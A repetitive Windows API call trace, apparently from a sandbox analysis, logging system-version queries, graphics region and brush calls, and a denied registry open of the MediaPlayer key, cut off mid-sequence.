[0088.139] DeleteObject (ho=0x610401cd) returned 1 [0088.139] DeleteObject (ho=0x5f0401d0) returned 1 [0088.139] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.139] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.139] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.139] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.139] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.139] BeginPath (hdc=0x0) returned 0 [0088.139] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.139] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.139] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.139] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.139] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.139] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.140] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.140] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.140] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x620401cd [0088.140] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x600401d0 [0088.140] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f24 [0088.140] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f25 [0088.140] CombineRgn (hrgnDst=0x1040f24, hrgnSrc1=0x620401cd, hrgnSrc2=0x600401d0, iMode=1) returned 1 [0088.140] CombineRgn (hrgnDst=0x1040f25, hrgnSrc1=0x620401cd, hrgnSrc2=0x600401d0, iMode=4) returned 2 [0088.140] CreateSolidBrush (color=0xff) returned 0x2100f23 [0088.140] CreateSolidBrush (color=0xff0000) returned 0x1100f26 [0088.140] DeleteObject (ho=0x1100f26) returned 1 [0088.140] DeleteObject (ho=0x600401d0) returned 1 [0088.140] DeleteObject (ho=0x620401cd) returned 1 [0088.140] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.140] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.140] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.140] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.140] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.140] BeginPath (hdc=0x0) returned 0 [0088.140] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.140] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.140] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.140] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.140] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.140] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.140] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.140] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.140] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x610401d0 [0088.140] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x630401cd [0088.140] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f27 [0088.140] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f28 [0088.140] CombineRgn (hrgnDst=0x1040f27, hrgnSrc1=0x610401d0, hrgnSrc2=0x630401cd, iMode=1) returned 1 [0088.140] CombineRgn (hrgnDst=0x1040f28, hrgnSrc1=0x610401d0, hrgnSrc2=0x630401cd, iMode=4) returned 2 [0088.140] CreateSolidBrush (color=0xff) returned 0x2100f26 [0088.141] CreateSolidBrush (color=0xff0000) returned 0x1100f29 [0088.141] DeleteObject (ho=0x1100f29) returned 1 [0088.141] DeleteObject (ho=0x630401cd) returned 1 [0088.141] DeleteObject (ho=0x610401d0) returned 1 [0088.141] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.141] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.141] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.141] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.141] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.141] BeginPath (hdc=0x0) returned 0 [0088.141] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.141] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.141] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.141] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.141] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.141] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.141] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.141] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.141] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x640401cd [0088.141] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x620401d0 [0088.141] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f2a [0088.141] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f2b [0088.141] CombineRgn (hrgnDst=0x1040f2a, hrgnSrc1=0x640401cd, hrgnSrc2=0x620401d0, iMode=1) returned 1 [0088.141] CombineRgn (hrgnDst=0x1040f2b, hrgnSrc1=0x640401cd, hrgnSrc2=0x620401d0, iMode=4) returned 2 [0088.141] CreateSolidBrush (color=0xff) returned 0x2100f29 [0088.141] CreateSolidBrush (color=0xff0000) returned 0x1100f2c [0088.141] DeleteObject (ho=0x1100f2c) returned 1 [0088.141] DeleteObject (ho=0x620401d0) returned 1 [0088.141] DeleteObject (ho=0x640401cd) returned 1 [0088.141] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.141] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.141] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.141] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.141] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.141] BeginPath (hdc=0x0) returned 0 [0088.141] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.141] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.141] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.141] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.141] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.142] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.142] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.142] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.142] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x630401d0 [0088.142] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x650401cd [0088.142] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f2d [0088.142] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f2e [0088.142] CombineRgn (hrgnDst=0x1040f2d, hrgnSrc1=0x630401d0, hrgnSrc2=0x650401cd, iMode=1) returned 1 [0088.142] CombineRgn (hrgnDst=0x1040f2e, hrgnSrc1=0x630401d0, hrgnSrc2=0x650401cd, iMode=4) returned 2 [0088.142] CreateSolidBrush (color=0xff) returned 0x2100f2c [0088.142] CreateSolidBrush (color=0xff0000) returned 0x1100f2f [0088.142] DeleteObject (ho=0x1100f2f) returned 1 [0088.142] DeleteObject (ho=0x650401cd) returned 1 [0088.142] DeleteObject (ho=0x630401d0) returned 1 [0088.142] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.142] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.142] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.142] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.142] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.142] BeginPath (hdc=0x0) returned 0 [0088.142] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.142] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.142] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.142] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.142] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.142] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.142] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.142] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.142] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x660401cd [0088.142] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x640401d0 [0088.142] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f30 [0088.142] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f31 [0088.143] CombineRgn (hrgnDst=0x1040f30, hrgnSrc1=0x660401cd, hrgnSrc2=0x640401d0, iMode=1) returned 1 [0088.143] CombineRgn (hrgnDst=0x1040f31, hrgnSrc1=0x660401cd, hrgnSrc2=0x640401d0, iMode=4) returned 2 [0088.143] CreateSolidBrush (color=0xff) returned 0x2100f2f [0088.143] CreateSolidBrush (color=0xff0000) returned 0x1100f32 [0088.143] DeleteObject (ho=0x1100f32) returned 1 [0088.143] DeleteObject (ho=0x640401d0) returned 1 [0088.143] DeleteObject (ho=0x660401cd) returned 1 [0088.143] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.143] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.143] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.143] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.143] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.143] BeginPath (hdc=0x0) returned 0 [0088.143] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.143] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.143] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.143] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.143] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.143] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.143] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.143] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.143] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x650401d0 [0088.143] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x670401cd [0088.143] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f33 [0088.143] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f34 [0088.143] CombineRgn (hrgnDst=0x1040f33, hrgnSrc1=0x650401d0, hrgnSrc2=0x670401cd, iMode=1) returned 1 [0088.143] CombineRgn (hrgnDst=0x1040f34, hrgnSrc1=0x650401d0, hrgnSrc2=0x670401cd, iMode=4) returned 2 [0088.143] CreateSolidBrush (color=0xff) returned 0x2100f32 [0088.144] CreateSolidBrush (color=0xff0000) returned 0x1100f35 [0088.144] DeleteObject (ho=0x1100f35) returned 1 [0088.144] DeleteObject (ho=0x670401cd) returned 1 [0088.144] DeleteObject (ho=0x650401d0) returned 1 [0088.144] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.144] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.144] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.144] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.144] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.144] BeginPath (hdc=0x0) returned 0 [0088.144] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.144] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.144] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.144] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.144] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.144] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.144] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.144] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.144] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x680401cd [0088.144] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x660401d0 [0088.144] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f36 [0088.144] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f37 [0088.144] CombineRgn (hrgnDst=0x1040f36, hrgnSrc1=0x680401cd, hrgnSrc2=0x660401d0, iMode=1) returned 1 [0088.144] CombineRgn (hrgnDst=0x1040f37, hrgnSrc1=0x680401cd, hrgnSrc2=0x660401d0, iMode=4) returned 2 [0088.144] CreateSolidBrush (color=0xff) returned 0x2100f35 [0088.144] CreateSolidBrush (color=0xff0000) returned 0x1100f38 [0088.144] DeleteObject (ho=0x1100f38) returned 1 [0088.144] DeleteObject (ho=0x660401d0) returned 1 [0088.144] DeleteObject (ho=0x680401cd) returned 1 [0088.145] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.145] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.145] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.145] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.145] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.145] BeginPath (hdc=0x0) returned 0 [0088.145] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.145] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.145] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.145] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.145] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.145] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.145] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.145] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.145] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x670401d0 [0088.145] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x690401cd [0088.145] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f39 [0088.145] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f3a [0088.145] CombineRgn (hrgnDst=0x1040f39, hrgnSrc1=0x670401d0, hrgnSrc2=0x690401cd, iMode=1) returned 1 [0088.145] CombineRgn (hrgnDst=0x1040f3a, hrgnSrc1=0x670401d0, hrgnSrc2=0x690401cd, iMode=4) returned 2 [0088.145] CreateSolidBrush (color=0xff) returned 0x2100f38 [0088.145] CreateSolidBrush (color=0xff0000) returned 0x1100f3b [0088.145] DeleteObject (ho=0x1100f3b) returned 1 [0088.145] DeleteObject (ho=0x690401cd) returned 1 [0088.145] DeleteObject (ho=0x670401d0) returned 1 [0088.145] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.145] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.146] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.146] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.146] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.146] BeginPath (hdc=0x0) returned 0 [0088.146] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.146] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.146] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.146] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.146] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.146] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.146] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.146] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.146] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6a0401cd [0088.146] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x680401d0 [0088.146] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f3c [0088.146] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040f3d [0088.146] CombineRgn (hrgnDst=0x1040f3c, hrgnSrc1=0x6a0401cd, hrgnSrc2=0x680401d0, iMode=1) returned 1 [0088.146] CombineRgn (hrgnDst=0x1040f3d, hrgnSrc1=0x6a0401cd, hrgnSrc2=0x680401d0, iMode=4) returned 2 [0088.146] CreateSolidBrush (color=0xff) returned 0x2100f3b [0088.146] CreateSolidBrush (color=0xff0000) returned 0x1100f3e [0088.146] DeleteObject (ho=0x1100f3e) returned 1 [0088.146] DeleteObject (ho=0x680401d0) returned 1 [0088.146] DeleteObject (ho=0x6a0401cd) returned 1 [0088.146] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.146] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.146] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.146] SelectObject (hdc=0x0, h=0x0) returned 0x0 